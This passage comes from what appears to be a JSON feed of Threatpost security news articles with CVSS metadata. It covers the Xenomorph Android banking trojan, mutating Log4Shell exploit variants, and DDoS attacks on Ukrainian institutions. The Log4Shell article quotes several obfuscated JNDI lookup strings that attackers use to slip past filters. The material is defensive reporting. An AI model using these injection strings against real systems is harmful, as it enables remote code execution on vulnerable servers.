applications are present, it goes on to download the corresponding overlays to inject.\n\n\u201cThe list of overlay targets returned by Xenomorph includes targets from Spain, Portugal, Italy and Belgium, as well as some general purpose applications like emailing services, and cryptocurrency wallets,\u201d according to ThreatFabric.\n\nAfter obtaining Accessibility Services privileges, Xenomorph will first register and verify itself with the C2, by sending a request using the legitimate, open-source project Retrofit2 (a type-safe REST client for Android, Java and Kotlin developed by Square).\n\nThat first message contains the initial information exfiltrated about the device, according to ThreatFabric. After that, Xenomorph periodically polls for new commands from the C2.\n\nFor now, the commands allow the malware to log SMS messages, list the web injects sent by the C2, enable or disable intercept notifications, and enumerate installed apps.\n\nMeanwhile, the malware also performs the aforementioned logging: \u201cAll the information gathered is only displayed on the local device logs, but in the future a very minor modification would be enough to add keylogging and Accessibility logging capabilities to the malware,\u201d researchers warned.\n\n## **Part of the Alien Franchise?**\n\nThreatFabric\u2019s analysis uncovered evidence of code reuse that links Xenomorph to the known Alien malware, which is a descendent of the [infamous Cerberus malware](<https://threatpost.com/cerberus-banking-trojan-unleashed-google-play/157218/>).\n\nThese include the \u201cuse of the same HTML resource page to trick victims into granting the Accessibility Services privileges.\u201d And further, Xenomorph uses state-tracking through the use of the \u201cSharedPreferences\u201d file.\n\n\u201cThis file is commonly used to track the state of an application,\u201d researchers noted. \u201cHowever, the style of variable naming used by Xenomorph is very reminiscent of Alien, despite being potentially even more detailed.\u201d\n\nThey added, \u201cpotentially the most interesting fact is the actual name of the sharedPreferences file used to store the configuration for Xenomorph: the file is named ring0.xml. This might look like any other generic random string, but it happens to coincide with the name of the supposed actor behind the development of the original Alien malware.\u201d\n\nEven though for now Xenomorph is a fairly typical banking trojan, ThreatFabric noted that it does have untapped potential.\n\n\u201cModern banking malware is evolving at a very fast rate, and criminals are starting to adopt more refined development practices to support future updates,\u201d researchers concluded. \u201cXenomorph is at the forefront of this change\u2026ThreatFabric predicts that with some more time to finish development, this malware could reach higher threat levels, comparable to other modern Android banking trojans.\u201d\n\n_**Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>), \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, will focus on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be **_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-22T18:00:30", "type": "threatpost", "title": "Xenomorph Malware Burrows into Google Play Users, No Facehugger Required", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-22T18:00:30", "id": "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "href": "https://threatpost.com/xenomorph-malware-google-play-facehugger/178563/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:10:35", "description": "The internet has a fast-spreading, malignant cancer \u2013 otherwise known as the Apache Log4j logging library exploit \u2013 that\u2019s been rapidly mutating and attracting swarms of attackers since it was publicly disclosed last week.\n\nMost of the attacks focus on cryptocurrency mining done on victims\u2019 dimes, as seen by [Sophos](<https://twitter.com/SophosLabs/status/1470213371521810432>), [Microsoft](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/?ranMID=24542&ranEAID=TnL5HPStwNw&ranSiteID=TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA&epi=TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA&irgwc=1&OCID=AID2200057_aff_7593_1243925&tduid=%28ir__cypaumpgf9kf6hvtats20idnqu2xoijddhze9dj600%29%287593%29%281243925%29%28TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA%29%28%29&irclickid=_cypaumpgf9kf6hvtats20idnqu2xoijddhze9dj600>) and other security firms. However, attackers are actively trying to install far more dangerous malware on vulnerable systems as well.\n\nAccording to [Microsoft](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) researchers, beyond coin-miners, they\u2019ve also seen installations of [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), which attackers can use to steal passwords, creep further into compromised networks with lateral movement and exfiltrate data.\n\nAlso, it could get a lot worse. Cybersecurity researchers at [Check Point warned](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) on Monday that the evolution has already led to more than 60 bigger, brawnier mutations, all spawned in less than a day.\n\n\u201cSince Friday we witnessed what looks like an evolutionary repression, with new variations of the original exploit being introduced rapidly: over 60 in less than 24 hours,\u201d they said.\n\nThe flaw, which is uber-easy to exploit, has been named [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>). It\u2019s resident in the ubiquitous Java logging library Apache Log4j and could allow unauthenticated remote code execution (RCE) and complete server takeover. It first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft, last Thursday, and was being exploited in the wild within hours of public disclosure.\n\n## Mutations May Enable Exploits to Slip Past Protections\n\nOn Monday, Check Point reported that Log4Shell\u2019s new, malignant offspring can now be exploited \u201ceither over HTTP or HTTPS (the encrypted version of browsing),\u201d they said.\n\nThe more ways to exploit the vulnerability, the more alternatives attackers have to slip past the new protections that have frantically been pumped out since Friday, Check Point said. \u201cIt means that one layer of protection is not enough, and only multilayered security postures would provide a resilient protection,\u201d they wrote.\n\nBecause of the enormous attack surface it poses, some security experts are calling Log4Shell the biggest cybersecurity calamity of the year, putting it on par with the 2014 [Shellshock](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>) family of security bugs that was exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning within hours of its initial disclosure.\n\n## Tactical Shifts\n\nBesides variations that can slip past protections, researchers are also seeing new tactics.\n\nLuke Richards, Threat Intelligence Lead at AI cybersecurity firm Vectra, told Threatpost on Monday that initial exploit attempts were basic call backs, with the initial exploit attempt coming from TOR nodes. They mostly pointed back to \u201cbingsearchlib[.]com,\u201d with the exploit being passed into the User Agent or the Uniform Resource Identifier (URI) of the request.\n\nBut since the initial wave of exploit attempts, Vectra has tracked many changes in tactics by the threat actors who are leveraging the vulnerability. Notably, there\u2019s been a shift in the commands being used, as the threat actors have begun obfuscating their requests.\n\n\u201cThis originally included stuffing the User Agent or URI with a base64 string, which when decoded by the vulnerable system caused the host to download a malicious dropper from attacker infrastructure,\u201d Richards explained in an email. Following this, the attackers started obfuscating the Java Naming and Directory Interface (JDNI) string itself, by taking advantage of other translation features of the JDNI process.\n\nHe offered these examples:\n\n${jndi:${lower:l}${lower:d}a${lower:p}://world80 \n${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}// \n${jndi:dns://\n\n\u2026All of which achieve the same objective: \u201cto download a malicious class file and drop it onto the target system, or to leak credentials of cloud-based systems,\u201d Richards said.\n\n## Bug Has Been Targeted All Month\n\nAttackers have been buzzing around the Log4Shell vulnerability since at least Dec. 1, it turns out, and as soon as CVE-2021-44228 was publicly disclosed late last week, attackers began to swarm around honeypots.\n\nOn Sunday, Sophos researchers [said](<https://twitter.com/SophosLabs/status/1470213367142965254?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1470213367142965254%7Ctwgr%5E%7Ctwcon%5Es1_c10&ref_url=https%3A%2F%2Fkasperskycontenthub.com%2Fthreatpost-global%2Fwp-admin%2Fpost-new.php>) that they\u2019d \u201calready detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability,\u201d noting that log searches by other organizations (including Cloudflare) suggest that the vulnerability may have been openly exploited for weeks.\n\n> Sophos has already detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability, and log searches by other organizations (including Cloudflare) suggest the vulnerability may have been openly exploited for weeks. 11/16 [pic.twitter.com/dbAXG5WdZ8](<https://t.co/dbAXG5WdZ8>)\n> \n> \u2014 SophosLabs (@SophosLabs) [December 13, 2021](<https://twitter.com/SophosLabs/status/1470213367142965254?ref_src=twsrc%5Etfw>)\n\n\u201cEarliest evidence we\u2019ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC,\u201d Cloudflare CEO Matthew Prince [tweeted](<https://twitter.com/eastdakota/status/1469800951351427073>) on Saturday. \u201cThat suggests it was in the wild at least nine days before publicly disclosed. However, don\u2019t see evidence of mass exploitation until after public disclosure.\u201d\n\nOn Sunday, Cisco Talos [chimed in](<https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html>) with a similar timeframe: It first saw attacker activity related to CVE-2021-44228 starting on Dec. 2. \u201cIt is recommended that organizations expand their hunt for scanning and exploit activity to this date,\u201d it advised.\n\n## Exploits Attempted on 40% of Corporate Networks\n\nCheck Point said on Monday that it\u2019s thwarted more than 845,000 exploit attempts, with more than 46 percent of those attempts made by known, malicious groups. In fact, Check Point warned that it\u2019s seen more than 100 attempts to exploit the vulnerability per minute.\n\nAs of 9 a.m. ET on Monday, its researchers had seen exploits attempted on more than 40 percent of corporate networks globally.\n\nThe map below illustrates the top targeted geographies.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/13121325/map.jpg>)\n\nTop affected geographies. Source: Check Point.\n\nHyperbole isn\u2019t an issue with this flaw. Security experts are rating it as one of the worst vulnerabilities of 2021, if not the tip-top most terrible. Dor Dali, Director of Information Security at Vulcan Cyber, classes it in the top-three worst flaws of the year: \u201cIt wouldn\u2019t be a stretch to say that every enterprise organization uses Java, and Log4j is one of the most-popular logging frameworks for Java,\u201d Dali noted via email on Monday. \u201cConnecting the dots, the impact of this vulnerability has the reach and potential to be substantial if mitigation efforts aren\u2019t taken right away.\u201d\n\nAs has been repeatedly stressed since its initial public disclosure, the Log4j vulnerability \u201cis relatively easy to exploit, and we\u2019ve already seen verifiable reports that bad actors are actively running campaigns against some of the largest companies in the world,\u201d Dali reiterated. \u201cHopefully every organization running Java has the ability to secure, configure and manage it. If Java is being used in production systems IT security teams must prioritize the risk and mitigation campaigns and follow remediation guidelines from the Apache Log4j project as soon as possible.\u201d\n\nThis situation is rapidly evolving, so keep an eye out for additional news. Below are some of the related pieces we\u2019ve seen, along with some of the new protections and detection tools.\n\n## More News\n\n * ** **[**Linux botnets have already exploited the flaw.**](<https://securityaffairs.co/wordpress/125562/malware/linux-botnets-log4shell-flaw.html?utm_source=feedly&utm_medium=rss&utm_campaign=linux-botnets-log4shell-flaw>) [NetLab 360](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) reported on Saturday that two of its honeypots have been attacked by the [Muhstik](<https://threatpost.com/muhstik-botnet-attacks-tomato-routers/152079/>) and [Mirai](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) botnets. Following detection of those attacks, the Netlab 360 team found [other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) on the hunt for the Log4Shell vulnerability, including the DDoS family Elknot, the mining family m8220, SitesLoader, xmrig.pe, xmring.ELF, attack tool 1, attack tool 2, plus one unknown and a PE family. [BleepingComputer](<https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/>) also reports that it\u2019s observed the threat actors behind the [Kinsing](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) backdoor and cryptomining botnet \u201cheavily abusing the Log4j vulnerability.\u201d\n * [**CISA has added Log4Shell to the Known Exploited Vulnerabilities Catalog**](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog>).\n * [**Quebec shut down thousands of sites**](<https://securityaffairs.co/wordpress/125556/hacking/quebec-shut-down-sites-log4shell.html?utm_source=feedly&utm_medium=rss&utm_campaign=quebec-shut-down-sites-log4shell>) after disclosure of the Log4Shell flaw. \u201c\u201dWe need to scan all of our systems,\u201d said Canadian Minister Responsible for Digital Transformation and Access to Information Eric Caire in a news conference. \u201cWe\u2019re kind of looking for a needle in a haystack.\u201d\n\n## New Protections, Detection Tools\n\n * On Saturday, Huntress Labs released a tool \u2013 [available here](<https://log4shell.huntress.com/>) \u2013 to help organizations test whether their applications are vulnerable to CVE-2021-44228.\n * Cybereason released [Logout4Shell](<https://github.com/apache/logging-log4j2/pull/608>), a \u201cvaccine\u201d for the Log4Shell Apache Log4j RCE, that uses the vulnerability itself to set the flag that turns it off.\n\n## Growing List of Affected Manufacturers, Components\n\nAs of Monday, the internet was still in meltdown drippy mode, with an ever-growing, crowd-sourced list [hosted on GitHub](<https://github.com/YfryTchsGD/Log4jAttackSurface>) that only scratches the surface of the millions of applications and manufacturers that use log4j for logging. The list indicates whether they\u2019re affected by Log4Shell and provides links to evidence if they are.\n\nSpoiler alert: Most are, including:\n\n * [Amazon](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Amazon.md>)\n * [Apache Druid](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheDruid.md>)\n * [Apache Solr](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheSolr.md>)\n * [Apache Struts2](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheStruts2.md>)\n * [Apple](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/apple.md>)\n * [Baidu](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Baidu.md>)\n * [CloudFlare](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/CloudFlare.md>)\n * [DIDI](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/DIDI.md>)\n * [ElasticSearch](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ElasticSearch.md>)\n * [Google](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Google.md>)\n * [JD](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/JD.md>)\n * [LinkedIn](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/LinkedIn.md>)\n * [NetEase](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/NetEase.md>)\n * [Speed camera LOL](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/SpeedCamera.md>)\n * [Steam](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Steam.md>)\n * [Tesla](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Tesla.md>)\n * [Tencent](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Tencent.md>)\n * [Twitter](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Twitter.md>)\n * [VMWare](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWare.md>)\n * [VMWarevCenter](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWarevCenter.md>)\n * [Webex](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Webex.md>)\n\n## A Deep Dive and Other Resources\n\n * **Immersive Labs** has posted a[ hands-on lab](<https://www.linkedin.com/posts/immersive-labs-limited_in-december-a-zero-day-vulnerability-affecting-activity-6876088019028336640-MtYh>) of the incident.\n * **Lacework** has published a [blog post ](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) regarding how the news affects security best practices at the developer level.\n * **NetSPI** has published a [blog post](<https://www.netspi.com/blog/executive/security-industry-trends/log4j-zero-day-vulnerability-impact/>) that includes details on Log4Shell\u2019s impact, guidance to determine whether your organization is at risk, and mitigation recommendations.\n\nThis is a developing story \u2013 stay tuned to Threatpost for ongoing coverage.\n\n121321 13:32 UPDATE 1: Added input from Dor Dali and Luke Richards. \n121321 14:15 UPDATE 2: Added additional botnets detected by NetLab 360.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ **_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This_**[ **_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken. \n_** \n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T18:14:46", "type": "threatpost", "title": "Log4Shell Is Spawning Even Nastier Mutations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T18:14:46", "id": "THREATPOST:34D98758A035C36FED68DDD940415845", "href": "https://threatpost.com/apache-log4j-log4shell-mutations/176962/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:54", "description": "On Tuesday, institutions central to Ukraine\u2019s military and economy were hit with a wave of denial-of-service (DoS) attacks, which sparked an avalanche of headlines around the world. The strike itself had limited impact \u2014 but the larger implications for critical infrastructure beyond the Ukraine are worth noting, researchers said.\n\nThe targets were core entities to Ukraine: the Armed Forces of Ukraine, the Ministry of Defense, Oschadbank (the State Savings Bank) and Privatbank, the country\u2019s largest commercial bank, servicing nearly [20 million](<https://en.privatbank.ua/about>) customers. Oschadbank and Privatbank are considered \u201c[systemically important](<https://bank.gov.ua/en/news/all/natsionalniy-bank-onoviv-perelik-sistemno-vajlivih-bankiv>)\u201d to Ukraine\u2019s financial markets.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\nAdam Meyers, senior vice president of intelligence at CrowdStrike, said via email that the attacks consisted of \u201ca large volume of traffic, three orders of magnitude more than regularly observed traffic, with 99 percent of this traffic consisting of HTTPs requests.\u201d\n\n## **What Happened?**\n\nBy overloading targeted servers, this kind of DoS attack ensured that end users couldn\u2019t access their websites, bank accounts and so on for a period of time. As Ukraine\u2019s Center for Strategic Communications noted in a Facebook [post](<https://www.facebook.com/StratcomCentreUA/posts/290808713119116>), some Privatbank customers found themselves \u201ccompletely unable to access\u201d the company\u2019s app, while others\u2019 accounts \u201cdo not reflect balance and recent transactions.\u201d\n\nSome customers received SMS messages claiming that ATMs were out of order, according to Ukraine\u2019s Cyberpolice, which [tweeted](<https://twitter.com/CyberpoliceUA/status/1493578811492950020>) the claim. Those reports however were debunked, [according to](<https://www.npr.org/2022/02/15/1080876311/ukraine-hack-denial-of-service-attack-defense>) NPR.\n\nCrucially, the attackers disrupted the _availability _of these websites and services, but not the _integrity _of any data. Thus, the transactions, balances and private information associated with bank accounts and military databases appear to be untainted, according to reports.\n\n[And, according](<https://cip.gov.ua/en/news/shodo-kiberataki-na-saiti-viiskovikh-struktur-ta-derzhavnikh-bankiv>) to Ukraine\u2019s State Special Communications Service, a \u201cworking group of experts\u201d convened yesterday to take \u201call necessary measures to localize and resist the cyberattack.\u201d All affected banking services had resumed by 7:30 p.m. local time on Tuesday, and the websites for the Armed Forces and Ministry of Defense have since been restored.\n\n\u201cThe DDoS attacks against the Ukrainian defense ministry and financial institutions appear to be harassment similar to the previous DDoS attacks [seen in January](<https://threatpost.com/be-afraid-massive-cyberattack-downs-ukrainian-govt-sites/177659/>),\u201d Rick Holland, CISO at Digital Shadows, said via email. \u201cThey could be a precursor to a significant attack or a component of a broader campaign to intimidate and confuse Ukraine.\u201d\n\n## **Part of a Much Broader Campaign**\n\nWhile limited in impact, these events have come mere hours after the Security Service of Ukraine\u2019s (SSU) [reported](<https://ssu.gov.ua/en/novyny/zaiava-sbu-shchodo-proiaviv-hibrydnoi-viiny-v-informatsiinomu-prostori>) a \u201cmassive wave of hybrid warfare\u201d \u2013 [120](<https://ssu.gov.ua/en/novyny/u-sichni-2022-roku-sbu-zablokuvala-ponad-120-kiberatak-na-ukrainski-orhany-vlady>) cyberattacks against government authorities, and a fake news botnet of more than [18,000](<https://ssu.gov.ua/en/novyny/sbu-likviduvala-18ty-tysiachnu-botofermu-u-lvovi-pid-kuratorstvom-rf-siialy-paniku-ta-minuvaly-obiekty-video>) social-media accounts \u2013 all designed to \u201csystemically sow panic, spread fake information and distort the real state of affairs\u201d in the country.\n\nThe SSU attributed this wave of hostile activity to a single unnamed but obvious \u201caggressor state.\u201d\n\nLikewise, Tuesday\u2019s attacks have not been officially attributed. Still, their timing, as Russia mobilizes more than 100,000 troops at Ukraine\u2019s northeast border, is inspiring speculation.\n\n\u201cIt would be no surprise,\u201d wrote Mike McLellan, director of intelligence at SecureWorks, via email, \u201cif it transpires that they are the result of cyberattacks conducted by Russia, or by threat actors with a pro-Russian agenda.\u201d\n\nHe added, \u201cRussia has a history of cyberattacks \u201cdesigned to distract the Ukrainian government and critical infrastructure operators and undermine the trust among the Ukrainian population.\u201d\n\nAnd indeed, in the past two months, Russian- advanced persistent threats (APTs) have been tied to an [attack](<https://threatpost.com/be-afraid-massive-cyberattack-downs-ukrainian-govt-sites/177659/>) on 70 Ukrainian government websites, a [wiper](<https://threatpost.com/destructive-wiper-ukraine/177768/>) targeting government, non-profit and IT organizations, and increased [attacks and espionage](<https://threatpost.com/gamaredon-apt-toolset-ukraine/152568/>) against military targets.\n\nIt\u2019s also worth noting that the 2014 Russian invasion of Crimea [coincided with](<https://resources.infosecinstitute.com/topic/crimea-russian-cyber-strategy-hit-ukraine/>) an outbreak of the [Turla virus](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>), and targeted espionage attacks against government agencies, politicians and businesses.\n\nOthers however noted that there could be many beneficiaries to the fog of potential war.\n\n\u201cWhat could be a more likely scenario [than Russia carrying out the attacks] is that other countries like China and Iran take advantage of the chaos and fog of war to further their interests and conduct their campaigns against the West,\u201d Holland noted. \u201cAs the saying goes, \u2018never let a good crisis go to waste.\u2019 The risk of these types of false-flag operations could have unintended consequences, and you can\u2019t close Pandora\u2019s Box once it\u2019s opened.\u201d\n\nTim Wade, technical director and deputy CTO at Vectra, cautioned against hasty attribution.\n\n\u201cThere are no shortage of actors that could stand to benefit from chaos or disruption \u2013 ranging from criminal actors to nation states \u2013 and that, unlike Hollywood movies, real motivations can be tricky to unwind,\u201d he said via email.\n\n## **Could Ukraine\u2019s Problems Migrate West?**\n\nBesides the direct threat to Ukrainians, increasing cyber-disruption in the region could spill over to affect American and European countries and businesses.\n\nPrior attacks against Ukrainian targets have crippled companies that simply do business or passively interact with Ukrainian organizations. Famously, the 2017 [NotPetya malware](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) that breached a Kiev-based accounting software vendor ended up causing [billions of dollars of damage](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>) to multinational corporations like Maersk, Merck and FedEx.\n\nGovernment officials have been warning of the potential for similar attacks directed at the United States government and its critical industries. A January [bulletin](<https://info.publicintelligence.net/DHS-UkraineInvasionCyberAttacks.pdf>) from the Department of Homeland Security (DHS) concluded that \u201cRussia would consider initiating a cyberattack against the Homeland if it perceived a U.S. or NATO response to a possible Russian invasion of Ukraine threatened its long-term national security.\u201d\n\nThe [_DHS and FBI this week also warned_](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUfnCpRAdaEZ-2Fzb6CvhwO2WfCysAcwxa-2FOx6Xho58-2BYfSYyLoJDjBKk191ALVSfQe7tKhtpt14nvCWvRWtjQ5ia-2Bxy-2FAHNuEWnCoDD4HJMf8OJPniUjq-2B73i7hrTuhggh8r40SSt8yAJN6BeVN-2BkmdzRhazj8-2BjAsse8M0ns4vlmM4yK8nCFV0oUzvOT01MzpXw-3D-3DEQ6l_ZRLSPEhX0sWy6v6-2FW4BoBGwvynWnvEEKCCoI2tE2RSv7Ap1BbaYTRGgOsmBtH3N8QKMiyASu9uND9imXoTFn2JxQFydFAQqAST8UQ4mPJ45BLqxiPCRq-2F8g1sIIIifFF67f6vand8CQnio175DMlDx-2BtZjU9X-2BUnk00U6HL2Yt4yyDbwA5dz19QLe0tu0POPLp-2Fgsr5OJD90lYAoTgrjHLrtnapc4YpMEy1t1oB-2FDSc0tf3yxTecOYhCatjqqOm4kJQYHeuGl-2BEr4Nvd1gCZbw27qOfv2B-2BBdgMuXjXMnP622px6wYmsEQxT8XmTUE4Kp48bq-2BYS-2BZ-2BxIiX-2Fk3HtqWfdoiM23ih4UUMDkfkykO0-3D>) of an uptick in Russian scanning of domestic law-enforcement networks and other American targets.\n\nSecurity researchers noted that it\u2019s important to be wary as the geo-political tensions continue \u2014 given that the chaos that would arise from a full-blown Russian incursion would provide plenty of cover for cyberattackers of all stripes.\n\nAs Crowdstrike\u2019s Meyers said, \u201cwhile there is no evidence of any targeting of western entities at this time, there is certainly potential for collateral impact as a result of disruptive or destructive attacks targeting Ukraine \u2013 this could impact companies that have a presence in Ukraine, those that do business with Ukrainian companies, or have a supply chain component in Ukraine such as code development/offshoring.\u201d\n\nWould the U.S. be ready in such a scenario? Last week, DHS officials [_told American cities_](<https://www.usatoday.com/story/news/politics/2022/02/08/local-government-cybersecurity-digital-threats/9208951002/?gnt-cfr=1>) that they were extra-vulnerable to wipers that could result in polluting a water supply or crashing a power grid. And it\u2019s worth noting that, according to [data](<https://www.cyberseek.org/heatmap.html>) from Cyber Seek, 600,000 cybersecurity roles across the nation are currently vacant, meaning that many organizations are understaffed for incident response.\n\n\u201cAre these attacks part of nation-state aggression? Or criminal opportunists exploiting a tense situation? Or just entirely coincidental? While answering with any certainty may be tough, what isn\u2019t difficult is drawing clear line of sight to the significance of cyber-resilience as it relates to critical services and infrastructure,\u201d Vectra\u2019s Wade noted. \u201cToday, everyone operating something of value has a target on their back and we\u2019d all do well to prepare for the inevitability of the consequences of that fact.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T16:04:36", "type": "threatpost", "title": "Ukrainian DDoS Attacks Should Put US on Notice\u2013Researchers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 